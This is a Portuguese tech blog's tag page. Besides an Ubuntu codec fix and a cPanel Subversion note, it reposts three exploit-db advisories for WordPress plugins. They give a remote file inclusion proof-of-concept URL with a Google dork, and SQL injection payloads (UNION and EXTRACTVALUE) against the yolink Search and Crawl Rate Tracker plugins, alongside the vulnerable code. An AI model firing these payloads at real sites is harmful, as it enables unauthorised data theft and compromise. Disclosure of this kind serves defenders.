Posts Tagged ‘plugin’

Playing error : Sua instalação do GStreamer está com um plug-in faltando. at /usr/bin/../share/gmusicbrowser/gmusicbrowser_gstreamer-0.10.pm line 135.

Thursday, December 1st, 2011

Se essa é a mensagem de erro ao tentar tocar um arquivo MP3 junto ao seu Ubuntu/Xubuntu/Kubuntu, não chore e nem desanime, na verdade o que está rolando é a falta de plugins para stream de audio.
Para sanar isto basta abrir seu terminal e digitar:

sudo apt-get install ubuntu-restricted-extras -y

Serão baixados mais de 100mb de plugins, mas tudo bacana (mp3, flash, mp4, avi e etc…).

Depois disso é só alegria.

Abraços a todos ;P

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

Friday, September 23rd, 2011


# Exploit Title: Relocate Upload WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{ // WP setup and function access
define('WP_USE_THEMES', false);
require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter

Fonte: http://www.exploit-db.com/exploits/17869/

WordPress yolink Search plugin

Tuesday, September 6th, 2011


# Exploit Title: WordPress yolink Search plugin < = 1.1.4 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip # Version: 1.1.4 (tested) --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1 --------------- Vulnerable code --------------- $post_type_in = array(); if( isset( $_POST['page'] ) ) { $post_type_in[] = '"page"'; } if( isset( $_POST['post'] ) ) { $post_type_in[] = '"post"'; } $post_type_in = '(' . implode(',', $post_type_in) . ')'; $id_from = $_POST['from_id']; $batch_size = $_POST['batch_size']; $post_recs = $wpdb->get_results( $wpdb->prepare( "SELECT ID,GUID FROM $wpdb->posts WHERE post_status='publish' AND post_type IN $post_type_in AND ID > $id_from order by ID asc LIMIT $batch_size" ) ); //misusage of $wpdb->prepare() :)

Fonte: http://www.exploit-db.com/exploits/17757/

WordPress Crawl Rate Tracker plugin

Tuesday, September 6th, 2011


# Exploit Title: WordPress Crawl Rate Tracker plugin < = 2.0.2 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip # Version: 2.0.2 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20 --------------- Vulnerable code --------------- class b3_chartData extends b3_sbTrackingConfig { public function tracking_bot_report_chart_data() { ... if($_GET['page_url'] != '') { $bots = $this->wpdb->get_results("SELECT DATE(FROM_UNIXTIME(`visit_time`)) `visit_date`,`robot_name`,COUNT(*) `total` FROM $this->sbtracking_table WHERE `visit_time` >= '$start' AND `visit_time` < = '$end' AND `page_url` = '" . $_GET['page_url'] . "' GROUP BY `visit_date`,`robot_name`"); ... if ($_GET['chart_data']==1) { ... $chartData = new b3_chartData(); echo $chartData->tracking_bot_report_chart_data();

Fonte: http://www.exploit-db.com/exploits/17755/

Subversion no Cpanel (how to use subversion server on cpanel/whm server)

Thursday, April 29th, 2010


Um amigo forista me passou nesta manha uma ferramenta interessante que foi desenvolvida por terceiros, mas que dá suporte ao Subversion no WHM/Cpanel. Quando conversei com Seto Ichitaka ele confirmou mesmo que a ferramenta funciona de forma bacaninha.

Algumas notas da empreitada podem ser vistas em:

http://forums.cpanel.net/f77/cpanelsvnmanager-beta-released-install-subversion-easily-149713.html

ou com a nota do site aonde o projeto está:

http://opensourcebattlefield.com/news/1

É fato que saibamos do seguinte:

1 – O plugin é iniciativa de terceiros,
2 – O plugin não está em stable, por isso qualquer update ou problema só tem 1 destino->reportBUG();

Abraços galera!